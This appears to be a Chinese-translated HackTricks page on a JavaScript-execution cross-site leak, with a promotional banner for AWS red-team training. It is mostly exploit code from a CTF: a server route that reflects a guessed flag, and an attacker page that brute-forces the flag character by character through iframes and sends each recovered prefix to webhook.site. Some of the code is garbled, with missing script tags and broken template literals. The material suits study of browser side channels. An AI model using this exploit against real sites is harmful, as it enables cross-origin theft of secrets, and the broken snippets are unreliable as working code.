JavaScript Execution XS Leak

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

```javascript // Code that will try ${guess} as flag (need rest of the server code app.get('/guessing', function(req, res) { let guess = req.query.guess let page = ` function foo() { // If not the flag this will be executed window.parent.foo() }

hello2

` res.send(page) }); ``` 主页会生成 iframes 到之前的 `/guessing` 页面,以测试每种可能性。 ```html let candidateIsGood = false; let candidate = '' let flag = 'bi0sctf{' let guessIndex = -1 let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'

// this will get called from our iframe IF the candidate is WRONG function foo() { candidateIsGood = false }

timerId = setInterval(() => { if (candidateIsGood) { flag = candidate guessIndex = -1 fetch('https://webhook.site/?flag='+flag) }

//Start with true and will be change to false if wrong candidateIsGood = true guessIndex++ if (guessIndex >= flagChars.length) { fetch('https://webhook.site/') return } let guess = flagChars[guessIndex] candidate = flag + guess let iframe = <iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe> console.log('iframe: ', iframe) hack.innerHTML = iframe } , 500);

hello

```

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

最后更新于